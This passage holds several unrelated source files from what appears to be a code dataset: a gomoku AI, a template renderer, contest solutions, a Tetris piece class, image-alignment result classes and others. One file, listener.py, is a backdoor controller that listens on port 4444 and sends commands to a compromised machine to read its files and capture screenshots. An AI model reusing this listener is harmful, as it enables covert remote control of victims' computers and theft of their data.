\r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=5 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=2 * how\r\n\r\n\r\n if s*1 in line:\r\n start=line.find(s*1)-1\r\n end=start+2\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos+=2 * how\r\n elif startPiece==\".\" or endPiece==\".\":\r\n pos+=1 * how\r\n\r\n\r\n\r\n\r\n if e+\".\"+e in line:\r\n start=line.find(e+\".\"+e)-1\r\n end=start+4\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=500000 * how\r\n elif startPiece==\".\":\r\n pos-=5000 * how\r\n elif endPiece==\".\":\r\n pos-=5000 * how\r\n\r\n\r\n\r\n\r\n \r\n if e+e+\".\"+e in line:\r\n start=line.find(e+e+\".\"+e)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\":\r\n 
pos-=10000 * how\r\n elif endPiece==\".\":\r\n pos-=10000 * how\r\n if e+\".\"+e+e in line:\r\n start=line.find(e+\".\"+e+e)-1\r\n end=start+5\r\n \r\n \r\n if start>=0:\r\n startPos=piecePos[start]\r\n startPiece=b[startPos[0]][startPos[1]]\r\n else:\r\n startPiece=\"N\"\r\n if end<=len(line)-1:\r\n endPos=piecePos[end]\r\n endPiece=b[endPos[0]][endPos[1]]\r\n else:\r\n endPiece=\"N\"\r\n \r\n if startPiece==\".\" and endPiece==\".\":\r\n pos-=1000000 * how\r\n elif startPiece==\".\":\r\n pos-=10000 * how\r\n elif endPiece==\".\":\r\n pos-=10000 * how\r\n if e+e+\".\"+e+e in line:\r\n\r\n \r\n pos-=10000000 * how\r\n if e+e+e+\".\"+e in line:\r\n \r\n pos-=10000000 * how\r\n if e+\".\"+e+e+e in line:\r\n\r\n \r\n pos-=10000000 * how\r\n\r\n\r\n\r\n\r\n return pos,checkend\r\n#the AI makes its move\r\ndef ai(positions,board):\r\n if positions!=dict():\r\n besty,bestx=positions[max(positions.keys())]\r\n\r\n board[besty][bestx]=\"X\"\r\n\r\n else:\r\n print(\"the AI of this game is too stupid to decide where to place its pawn.\")\r\n print(\"So it's time for u to defeat it.\")\r\n return board\r\n#game over\r\ndef gameover(text):\r\n if text==\"win\":\r\n print(\"U win!!!\")\r\n elif text==\"lose\":\r\n print(\"haha u lose!!!\")\r\n elif text==\"tie\":\r\n print(\"the board is full!!!\")\r\n print(\"LOOK WHAT U'VE DONE!!!\")\r\n time.sleep(5)\r\n print(\"end!\")\r\n sys.exit()#end script\r\n\r\n\r\n#initialization\r\nk=7#default\r\nk=setDifficulty()\r\nsize=setSize()\r\nCheckDepth=1\r\nboard=[[\".\" for i in range(size)] for i in range(size)]\r\nboardWidth=1\r\n\r\n#set the colors\r\nfcolor=colored.fg(\"black\")\r\nbcolor=colored.bg(\"white\")\r\nreset=colored.attr(\"reset\")\r\nmarkedcolor=colored.bg(\"orange_1\")\r\n\r\nboardSpaceAmount=size**2\r\nprint(f\"boardSpaceAmount:{boardSpaceAmount}\")\r\nprintBoard(board,boardWidth)\r\n#main game loop\r\nwhile 1:\r\n #the player makes a move\r\n player()\r\n boardSpaceAmount-=1\r\n clear()\r\n printBoard(board,boardWidth)\r\n positions=DeepCheck(1,True)#check whether someone has won\r\n \r\n\r\n \r\n #set the AI search depth\r\n CheckDepth=int(-0.05 * boardSpaceAmount +k)#k is 7 or 6, set by the chosen difficulty\r\n if CheckDepth<1:\r\n \tCheckDepth=1\r\n print(f\"CheckDepth : {CheckDepth}\")\r\n #the AI makes its move\r\n print(\"loading...\")\r\n positions=DeepCheck(CheckDepth,False)\r\n clear()\r\n board=ai(positions,board)\r\n boardSpaceAmount-=1\r\n printBoard(board,boardWidth)\r\n positions=DeepCheck(1,True)#check whether someone has won\r\n","repo_name":"Forever-CodingNoob/gomoku","sub_path":"minimax_fixed_colored_alpha.py","file_name":"minimax_fixed_colored_alpha.py","file_ext":"py","file_size_in_byte":19276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41686385457","text":"import sys\nimport yaml\nimport jinja2\n\ndef main():\n templateFile, configFiles = parse_args()\n with open(templateFile, \"r\") as fh:\n templateStr = fh.read()\n template = jinja2.Template(templateStr)\n configData = build_config(configFiles)\n sys.stdout.write(template.render(configData))\n\ndef parse_args():\n template = None\n configs = []\n argCount = len(sys.argv)\n i = 1\n while i < argCount:\n a = sys.argv[i]\n if a == \"-\":\n a = \"/dev/stdin\"\n if a.startswith(\"-\"):\n raise Exception(f\"Unknown option: {a}\")\n elif template == None:\n template = a\n else:\n configs.append(a)\n i += 1\n return [template, configs]\n\ndef build_config(config_files):\n result = {}\n for f in config_files:\n with open(f, \"r\") as fh:\n config = yaml.safe_load(fh.read())\n for key, value in config.items():\n result[key] = value\n return 
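The AllCheck recursion above alternates "AI" and "playerAI" turns and abandons a branch as soon as the alpha/beta bounds prove it cannot matter. A self-contained sketch of that cutoff on a toy game tree (the nested-list tree and leaf scores below are illustrative stand-ins, not the game's own board or scoring):

def alphabeta(node, alpha, beta, maximizing):
    # Leaves are numeric scores; internal nodes are lists of children.
    if not isinstance(node, list):
        return node
    if maximizing:
        value = float("-inf")
        for child in node:
            value = max(value, alphabeta(child, alpha, beta, False))
            alpha = max(alpha, value)
            if beta <= alpha:  # cutoff: the minimizer already has a better option
                break
        return value
    value = float("inf")
    for child in node:
        value = min(value, alphabeta(child, alpha, beta, True))
        beta = min(beta, value)
        if beta <= alpha:  # cutoff: the maximizer already has a better option
            break
    return value

tree = [[3, 5], [6, [9, 8]], [1, 2]]
assert alphabeta(tree, float("-inf"), float("inf"), True) == 6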
result\n\n","repo_name":"suzuki-navi/j2cli5","sub_path":"j2cli5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6203706553","text":"import numpy as np\nfrom baselines.baseline_gpy import run\nimport warnings\nfrom tqdm import tqdm\nwarnings.filterwarnings(\"ignore\")\n\n\ndef baseline(n, dims, lr, iters, approx, noise, batch_size = 512):\n rewards, lengths, peaks = run(n, dims, lr, iters, approx, noise, batch_size = batch_size)\n n = len(peaks)\n reward_avg = sum(rewards)/n\n length_avg = sum(lengths)/n\n peak_avg = sum(peaks)/n\n\n reward_std = round(np.std(rewards)/np.sqrt(n), 4)\n length_std = round(np.std(lengths)/np.sqrt(n), 4)\n peak_std = round(np.std(peaks)/np.sqrt(n), 4)\n \n print(f\"\\tReward: {round(reward_avg, 4)} ± {reward_std}, Length: {round(length_avg, 4)} ± {length_std}, Peak: {round(peak_avg, 4)} ± {peak_std}\")\n\n return reward_avg, length_avg, peak_avg\n\n\nbest_peak = -np.inf\nbest_length = None\nbest_reward = None\nbest_params = None\n\nlrs = [0.1, 0.01]\ntraining_iters = [25, 50, 100, 200]\napproxs = [True, False]\nnoises = [None, 0.1, 0.00001]\n\nlr_dict = {lr: [] for lr in lrs}\niter_dict = {iters: [] for iters in training_iters}\napprox_dict = {approx: [] for approx in approxs}\nnoise_dict = {noise: [] for noise in noises}\n\n\n#Too low? Okay I s'pose\nn = 5000\ndims = 2\nbatch_size = 1024\n\nfor lr in lrs:\n for iters in training_iters:\n for approx in approxs:\n for noise in noises:\n print(f\"Learning rate: {lr} Iterations: {iters} Approx: {approx} Noise: {noise}\")\n reward, length, peak = baseline(n, dims, lr, iters, approx, noise, batch_size)\n print(\"\\n\")\n if peak > best_peak:\n best_length = length\n best_reward = reward\n best_peak = peak\n best_params = {\"lr\":lr, \"iters\": iters, \"approx\": approx}\n lr_dict[lr].append(peak)\n iter_dict[iters].append(peak)\n approx_dict[approx].append(peak)\n noise_dict[noise].append(peak)\n \nprint(\"\\n\")\nprint(\"Averages:\\n\")\nprint(\"Leaning rate:\")\nfor lr, peaks in lr_dict.items():\n print(f\"\\tLearning rate: {lr} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Training iterations:\")\nfor iters, peaks in iter_dict.items():\n print(f\"\\tTraining iterations: {iters} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Approx:\")\nfor approx, peaks in approx_dict.items():\n print(f\"\\tApprox: {approx} Average: {round(np.mean(peaks), 4)}\")\n\nprint(\"Noise:\")\nfor noise, peaks in noise_dict.items():\n print(f\"\\tNoise: {noise} Average: {round(np.mean(peaks), 4)}\")\n\n\nprint(\"\\n\\n\")\n\nprint(\"Best params:\")\nprint(f\"\\tLearning rate: {best_params['lr']} Iterations: {best_params['iters']} Approx: {best_params['approx']} Noise: {best_params['noise']}\")\nprint(f\"\\tReward: {round(best_reward, 4)} Length: {round(best_length, 4)} Peak: {round(best_peak, 4)}\")","repo_name":"ALjone/Master-Thesis","sub_path":"hyperparameter_optimization_gpy.py","file_name":"hyperparameter_optimization_gpy.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5757107244","text":"task_name = \"ride\"\n\n\n\"\"\"\nID: alexand185\nLANG: PYTHON3\nTASK: ride\n\"\"\"\nfin = open ('{}.in'.format(task_name), 'r')\nfout = open ('{}.out'.format(task_name), 'w')\ninput = fin.readline\nfirst = input()\nnba = 1\nfor char in first: nba *= ord(char)-64\nsecond = input()\nnbb = 1\nfor char in 
second: nbb *= ord(char)-64\n\nif nba%47 == nbb%47:\n\tfout.write(\"GO\")\nelse:\n\tfout.write(\"STAY\")\n\nfout.write(\"\\n\")\n\n\nfout.close()","repo_name":"Epigone-Alex/Algo","sub_path":"2_USACOTRAINING.py","file_name":"2_USACOTRAINING.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38545377364","text":"# MISC FUNCTIONS\r\ndef deformatter( num ):\r\n deformatted = \"\"\r\n\r\n for i in num:\r\n if not ( i.isspace() or i == \",\" ):\r\n deformatted += i\r\n \r\n return deformatted\r\n\r\ndef formatter( number, dig ):\r\n num = deformatter( str( number ) )\r\n num_r = num[-1 : : -1]\r\n if( dig == 2 or dig == 16 ): grp = 4\r\n elif( dig == 8 or dig == 10 ): grp = 3\r\n\r\n formated = \"\"\r\n counter = 1\r\n for i in num_r:\r\n if ( counter <= grp ): \r\n formated += i\r\n counter += 1\r\n else: \r\n if( dig == 10 ): formated += \",\"\r\n else: formated += \" \"\r\n\r\n formated += i\r\n counter = 1\r\n \r\n return formated[-1 : : -1]\r\n\r\n# CONVERSION FUNCTIONS\r\ndef al_num( num ):\r\n dic_n = { 10 : \"A\", 11 : \"B\", 12 : \"C\", 13 : \"D\", 14 : \"E\", 15 : \"F\" }\r\n dic = { \"A\" : 10, \"B\" : 11, \"C\" : 12, \"D\" : 13, \"E\" : 14, \"F\" : 15 }\r\n \r\n if( num in dic ): result = str( dic[num] ) \r\n \r\n if( num in dic_n ): result = str( dic_n[num] )\r\n \r\n return result\r\n\r\ndef any_dec( number, dig, power ):\r\n num = deformatter( str( number ) )\r\n if ( num == \"\" ): return 0\r\n \r\n if( num[-1].isnumeric() ): result = int( num[-1] )\r\n else: result = int( al_num(num[-1] ) )\r\n \r\n return ( result ) * ( dig ** power ) + any_dec( num[0 : -1], dig, power + 1 )\r\n\r\ndef decany( num, dig ):\r\n if( num == 0 ): return \"0\"\r\n elif( num == 1 ): return \"1\"\r\n\r\n if( dig == 16 and ( num % dig ) > 9 ): result = al_num( num % dig )\r\n else: result = str( num % dig )\r\n\r\n return result + str( decany( num // dig, dig ) )\r\n\r\ndef dec_any( number, dig ):\r\n num = int ( deformatter( str ( number ) ) )\r\n\r\n temp_result = decany( num, dig )\r\n result = temp_result[-1: : -1]\r\n \r\n if not ( result[0] == \"0\" ): return result\r\n else: return result[1:]\r\n\r\n# ARITHMETIC FUNCTIONS\r\ndef arithmetic( num1, num2, op ):\r\n if( op == \"+\" ): return int( num1 ) + int( num2 )\r\n elif( op == \"-\" ): return int( num1 ) - int( num2 )\r\n elif( op == \"x\" ): return int( num1 ) * int( num2 )\r\n elif( op == \"/\" ): return int( num1 ) / int( num2 ) \r\n\r\n# EXTRAS\r\n\"\"\"\r\ndef negative( num, carry ):\r\n if( num == 0 and carry == 1): return \"1\" \r\n a = ( num % 10 ) + carry\r\n if( a == 0 ): b = c = 0\r\n elif( a == 1 ): \r\n b = 1\r\n c = 0\r\n elif( a == 2 ): \r\n b = 0 \r\n c = 1\r\n return str( b ) + negative( num // 10, c )\r\n\"\"\"","repo_name":"Atharva-Gondhali/Basic-Programmer-Calculator","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72836994435","text":"#this if for a 10x20 game grid\n\nclass GamePiece:\n tile_roots = {\"I\": (0, 0), \"O\": (1, 1), \"S\": (1, 0), \"Z\": (-1, -1), \"L\": (0, 0), \"J\": (0, 1), \"T\": (0, 0)}\n \n tiles = {\"O\": [[4, 14, 15, 5]], \n \"I\": [[4, 14, 24, 34], [3, 4, 5, 6]],\n \"S\": [[5, 4, 14, 13], [4, 14, 15, 25]], \n \"Z\": [[4, 5, 15, 16], [5, 15, 14, 24]], \n \"L\": [[4, 14, 24, 25], [5, 15, 14, 13], [4, 5, 15, 25], [6, 5, 4, 14]], \n \"J\": [[5, 15, 
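The any_dec/dec_any pair above can be cross-checked against Python's built-in base handling: int(s, base) parses digits A-F the same way al_num does, and format() renders binary/octal/hex. A small sketch (dec_to_base is an illustrative iterative equivalent of the recursive decany, not part of the original module):

assert int("1A", 16) == 26
assert format(26, "X") == "1A"
assert int("101", 2) == 5 and format(5, "b") == "101"

def dec_to_base(n, base, digits="0123456789ABCDEF"):
    # Repeated divmod, collecting remainders from least to most significant.
    if n == 0:
        return "0"
    out = []
    while n:
        n, r = divmod(n, base)
        out.append(digits[r])
    return "".join(reversed(out))

assert dec_to_base(26, 16) == "1A"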
25, 24], [15, 5, 4, 3], [5, 4, 14, 24], [4, 14, 15, 16]], \n \"T\": [[4, 14, 24, 15], [4, 13, 14, 15], [5, 15, 25, 14], [4, 5, 6, 15]]}\n valid_tiles = [\"O\", \"I\", \"S\", \"Z\", \"L\", \"J\", \"T\"]\n\n\n def __init__(self, tile_name, board_y, board_x):\n self.positions = []\n self.size = 0\n self.index = 0\n self.create_piece(tile_name, board_y, board_x)\n\n \n def get_root_tuple(self, tile_name, board_y, board_x):\n if tile_name not in GamePiece.valid_tiles:\n raise ValueError(\"Invalid tile name\")\n return GamePiece.tiles[tile_name][0][0] + (board_y * 10) + board_x\n\n\n def create_piece(self, tile_name, board_y, board_x):\n if tile_name not in GamePiece.valid_tiles:\n raise ValueError(\"Invalid tile name\") \n self.positions = self.modify_positions(GamePiece.tiles[tile_name], board_y - 20, board_x - 10)\n self.size = len(self.positions)\n self.index = 0\n\n\n def modify_positions(self, positions, board_y, board_x):\n #each rotation state is a list of flat indices, so shift every cell\n for i in range(len(positions)):\n for j in range(len(positions[i])):\n positions[i][j] += (board_y * 10) + board_x\n return positions\n\n\n def get_current_position(self):\n return self.positions[self.index]\n\n\n def rotate(self):\n self.index += 1\n if self.index == self.size:\n self.index = 0\n \n\n def move_position(self, movecode):\n if movecode == \"left\":\n self.move_left()\n elif movecode == \"right\":\n self.move_right()\n elif movecode == \"down\":\n self.move_down()\n else:\n raise ValueError(\"Invalid move code\")\n\n\n def move_left(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #move to other side if it goes off the board\n if self.positions[i][j] % 10 == 0:\n self.positions[i][j] += 9\n else:\n self.positions[i][j] -= 1\n \n \n def move_right(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #move to other side if it goes off the board\n if self.positions[i][j] % 10 == 9:\n self.positions[i][j] -= 9\n else:\n self.positions[i][j] += 1\n\n\n def move_down(self):\n for i in range(len(self.positions)):\n for j in range(len(self.positions[i])):\n #return to top if it goes off the board\n if self.positions[i][j] >= 190:\n self.positions[i][j] -= 190\n else:\n self.positions[i][j] += 10\n\n\n\n\n","repo_name":"akareen/Jetbrains-Academy-Python-Track","sub_path":"3. 
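Every value in the tiles dict above is a flat index into a 10-column board, which is why move_left/move_right test index % 10 and move_down adds 10. A tiny standalone sketch of the (row, col) <-> flat-index mapping the class relies on:

WIDTH = 10

def to_index(row, col):
    return row * WIDTH + col

def to_cell(index):
    return divmod(index, WIDTH)  # (row, col)

assert to_index(2, 4) == 24
assert to_cell(24) == (2, 4)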
Hard Projects/Tetris/game_piece.py","file_name":"game_piece.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38272242841","text":"#!/usr/bin/env python\n# license removed for brevity\n\nimport rospy\n\n#graph = {'livingroom-01': ['door-01', 'door-02', 'door-03', 'door-04', 'door-05'],\n# 'corridor-01': ['door-01'],\n# 'bedroom-01': ['door-02'],\n#\t 'bedroom-02': ['door-03'],\n# 'kitchen-01': ['door-04'],}\n\ngraph = {'livingroom-01': ['door-01', 'door-02', 'door-03', 'door-04', 'door-05'],\n 'door-01': ['corridor-01'],\n 'door-02': ['bedroom-01'],\n 'door-03': ['bedroom-02'],\n 'door-04': ['kitchen-01'],\n 'door-05': ['kitchen-01', 'bedroom-02']}\n\n\n\ndef find_shortest_path(graph, start, end, path=[]):\n path = path + [start]\n \n if start == end:\n return path\n \n if start not in graph:\n return None\n shortest = None\n \n for node in graph[start]:\n if node not in path:\n newpath = find_shortest_path(graph, node, end, path)\n if newpath:\n if not shortest or len(newpath) < len(shortest):\n shortest = newpath\n return shortest \n\n\nif __name__ == '__main__': \n path = find_shortest_path(graph, 'livingroom-01', 'corridor-01')\n\n for value in path:\n print(value)\n","repo_name":"ndeshp2s/inria_hbrs","sub_path":"semantic_navigation/knowledge_base/topological_map/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18149929307","text":"import sys\nsys.stdin = open('input.txt', \"r\")\n\nA,B = map(int, sys.stdin.readline().rstrip().split())\ndef solution(n :int) -> int:\n cnt = 1\n answer = n\n while ((1< \"Binding\":\n km: \"HydraKernelManager\" = self.parent\n assert hasattr(km, \"binding\")\n return km.binding\n\n async def kill(self, restart: bool = False) -> None:\n await self.send_signal(int(signal.SIGKILL))\n\n async def terminate(self, restart: bool = False) -> None:\n await self.send_signal(int(signal.SIGTERM))\n\n async def wait(self) -> \"Optional[int]\":\n ret = 0\n if self.has_process:\n while await self.poll() is None:\n await asyncio.sleep(self.poll_interval)\n\n self.reset()\n return ret\n\n async def cleanup(self, restart: bool = False) -> None:\n \"\"\"No-op cleanup default implementation to satisfy base class.\"\"\"\n pass\n\n def reset(self) -> None:\n \"\"\"Reset the has_process state.\n\n In general, this function should modify the state of the provisioner\n such that has_process returns false.\n \"\"\"\n pass\n\n\nclass FileManagementMixin:\n async def upload_path(self, local_path: \"str\", remote_path: \"str\" = None):\n raise NotImplementedError(\"Upload is not supported for this subkernel.\")\n\n async def download_path(self, remote_path: \"str\", local_path: \"str\" = None):\n raise NotImplementedError(\"Download is not supported for this subkernel.\")\n\n def prepare_upload(self, local_path: \"str\"):\n fd = io.BytesIO()\n path = pathlib.Path(local_path)\n arcname = \".\" if path.is_dir() else None\n\n with tarfile.open(fileobj=fd, mode=\"w:gz\") as tar:\n tar.add(local_path, arcname=arcname)\n fd.seek(0)\n\n return fd\n","repo_name":"ChameleonCloud/jupyterlab-chameleon","sub_path":"hydra_kernel/provisioning/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"23579247761","text":"t = 
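find_shortest_path above enumerates simple paths recursively, which is exponential in the worst case; for an unweighted graph like this one, breadth-first search finds a shortest path in O(V+E). A self-contained alternative sketch (not part of the original script):

from collections import deque

def bfs_shortest_path(graph, start, goal):
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            # Walk the predecessor chain back to the start.
            path = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in graph.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None

g = {"a": ["b", "c"], "b": ["d"], "c": ["d"]}
assert bfs_shortest_path(g, "a", "d") == ["a", "b", "d"]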
int(input())\r\n\r\nfor z in range(t):\r\n d,n=[int(n) for n in (input().split(' '))]\r\n ks=[]\r\n for y in range(n):\r\n kt,st=[int(n) for n in input().split(' ')]\r\n ks.append([kt,st])\r\n time=0\r\n td=0\r\n for x in ks:\r\n td = x[0] +x[1]*time\r\n if td>d:\r\n continue\r\n time = time + ((d-td)/x[1])\r\n r = (d/time)\r\n print (\"Case #{}: {}\".format(z+1,r))","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_206/1489.py","file_name":"1489.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"743122100","text":"import sys\ndata = list()\nfor line in sys.stdin:\n data.append(line.split())\n\n\nnot_ruler = False\n\nbiggest = 0\nfor i in data:\n list1 = dict()\n for a in range(0, len(i) - 1):\n for b in range(a+1, len(i)):\n change = int(i[b])\n if change > biggest:\n biggest = change\n temp = abs(int(i[a])-int(i[b]))\n if temp not in list1.keys():\n list1[abs(int(i[a])-int(i[b]))] = 1\n else:\n not_ruler = True\n break\n if not_ruler is True:\n break\n\n if not_ruler is True:\n print(\"not a ruler\")\n not_ruler = False\n elif len(list1) == biggest and not_ruler is False:\n print(\"perfect\")\n elif len(list1) != biggest and not_ruler is False:\n print(\"missing\", end=\" \")\n for key in range(1, biggest):\n if key not in list1.keys():\n print(key, end=\" \")\n\n biggest = 0\n","repo_name":"DragonOfTheEast/kattisProblems","sub_path":"Golomb Rulers.py","file_name":"Golomb Rulers.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40872625611","text":"from menpofit.result import (ParametricIterativeResult,\n MultiScaleParametricIterativeResult)\n\n\nclass LucasKanadeAlgorithmResult(ParametricIterativeResult):\n r\"\"\"\n Class for storing the iterative result of a Lucas-Kanade Image Alignment\n optimization algorithm.\n\n Parameters\n ----------\n shapes : `list` of `menpo.shape.PointCloud`\n The `list` of shapes per iteration. The first and last members\n correspond to the initial and final shapes, respectively.\n homogeneous_parameters : `list` of ``(n_parameters,)`` `ndarray`\n The `list` of parameters of the homogeneous transform per iteration.\n The first and last members correspond to the initial and final\n shapes, respectively.\n initial_shape : `menpo.shape.PointCloud` or ``None``, optional\n The initial shape from which the fitting process started. If\n ``None``, then no initial shape is assigned.\n image : `menpo.image.Image` or `subclass` or ``None``, optional\n The image on which the fitting process was applied. Note that a copy\n of the image will be assigned as an attribute. If ``None``, then no\n image is assigned.\n gt_shape : `menpo.shape.PointCloud` or ``None``, optional\n The ground truth shape associated with the image. If ``None``, then no\n ground truth shape is assigned.\n costs : `list` of `float` or ``None``, optional\n The `list` of cost per iteration. 
If ``None``, then it is assumed that\n the cost function cannot be computed for the specific algorithm.\n \"\"\"\n def __init__(self, shapes, homogeneous_parameters, initial_shape=None,\n image=None, gt_shape=None, costs=None):\n super(LucasKanadeAlgorithmResult, self).__init__(\n shapes=shapes, shape_parameters=homogeneous_parameters,\n initial_shape=initial_shape, image=image, gt_shape=gt_shape,\n costs=costs)\n self._homogeneous_parameters = homogeneous_parameters\n\n @property\n def homogeneous_parameters(self):\n r\"\"\"\n Returns the `list` of parameters of the homogeneous transform\n obtained at each iteration of the fitting process. The `list`\n includes the parameters of the `initial_shape` (if it exists) and\n `final_shape`.\n\n :type: `list` of ``(n_params,)`` `ndarray`\n \"\"\"\n return self._shape_parameters\n\n\nclass LucasKanadeResult(MultiScaleParametricIterativeResult):\n r\"\"\"\n Class for storing the multi-scale iterative fitting result of an ATM. It\n holds the shapes, shape parameters and costs per iteration.\n\n Parameters\n ----------\n results : `list` of :map:`ATMAlgorithmResult`\n The `list` of optimization results per scale.\n scales : `list` or `tuple`\n The `list` of scale values per scale (low to high).\n affine_transforms : `list` of `menpo.transform.Affine`\n The list of affine transforms per scale that transform the shapes into\n the original image space.\n scale_transforms : `list` of `menpo.shape.Scale`\n The list of scaling transforms per scale.\n image : `menpo.image.Image` or `subclass` or ``None``, optional\n The image on which the fitting process was applied. Note that a copy\n of the image will be assigned as an attribute. If ``None``, then no\n image is assigned.\n gt_shape : `menpo.shape.PointCloud` or ``None``, optional\n The ground truth shape associated with the image. If ``None``, then no\n ground truth shape is assigned.\n \"\"\"\n def __init__(self, results, scales, affine_transforms, scale_transforms,\n image=None, gt_shape=None):\n super(LucasKanadeResult, self).__init__(\n results=results, scales=scales, affine_transforms=affine_transforms,\n scale_transforms=scale_transforms, image=image, gt_shape=gt_shape)\n # Create parameters list\n self._homogeneous_parameters = []\n for r in results:\n self._homogeneous_parameters += r.homogeneous_parameters\n # Correct n_iters\n self._n_iters -= len(scales)\n\n @property\n def homogeneous_parameters(self):\n r\"\"\"\n Returns the `list` of parameters of the homogeneous transform\n obtained at each iteration of the fitting process. 
The `list`\n includes the parameters of the `initial_shape` (if it exists) and\n `final_shape`.\n\n :type: `list` of ``(n_params,)`` `ndarray`\n \"\"\"\n return self._homogeneous_parameters\n\n @property\n def shape_parameters(self):\n # Use homogeneous_parameters instead.\n raise AttributeError\n","repo_name":"papulke/face-of-art","sub_path":"menpofit/lk/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":4664,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"61"} +{"seq_id":"36921714947","text":"import socket\nimport os\nfrom colorama import Fore,Back,Style\n\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\nhost = socket.gethostname()\nport = 4444\n\ns.bind((host,port))\ns.listen()\nprint(Fore.GREEN+\"[+] Listening mode on!\"+Fore.RESET)\nconn,addr = s.accept()\nprint(Fore.CYAN+f\"[+] Connected from {addr}\"+Fore.RESET)\n\ndef help_func():\n print(\"Available command list\")\n\n print(\"pwd\")\n print(\"ls\")\n print(\"id\")\n print(\"cat\")\n print(\"uname\")\n print(\"screenshot\")\n print(\"(Command line will be UPDATED!)\")\n print(\"\\n\")\nwhile True:\n cmd = input(str(\":$ \"))\n if cmd == \"help\":\n help_func()\n\n elif cmd == \"pwd\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n \n elif cmd == \"ls\":\n conn.send(cmd.encode())\n path = input(str(\"$dir: \"))\n path = path.encode()\n conn.send(path)\n \n data = conn.recv(5000)\n data = data.decode()\n print(data)\n \n elif cmd == \"id\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n\n elif cmd == \"uname\":\n conn.send(cmd.encode())\n data = conn.recv(5000)\n data = data.decode()\n print(data)\n\n\n elif cmd == \"cat\":\n conn.send(cmd.encode())\n\n f = input(str(\"$file: \"))\n f = f.encode()\n conn.send(f)\n \n data = conn.recv(5000)\n data = data.decode()\n print(data)\n elif cmd == \"screenshot\":\n conn.send(cmd.encode())\n img = open(\"backdoor_screen.jpg\",\"wb\")\n img_data = conn.recv(5000000)\n i = True\n while i:\n img.write(img_data)\n i = False\n \n else:\n print(Back.RED+\"[-] Command Not Found!\"+Back.RESET)\n \n","repo_name":"Gsss3/python-backdor","sub_path":"listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70907905153","text":"\"\"\"\nImplements a tracker for corn crops using SORT algorithm.\n\nSORT is a simple, online and realtime tracking algorithm for 2D multiple\nobject tracking in video sequences. 
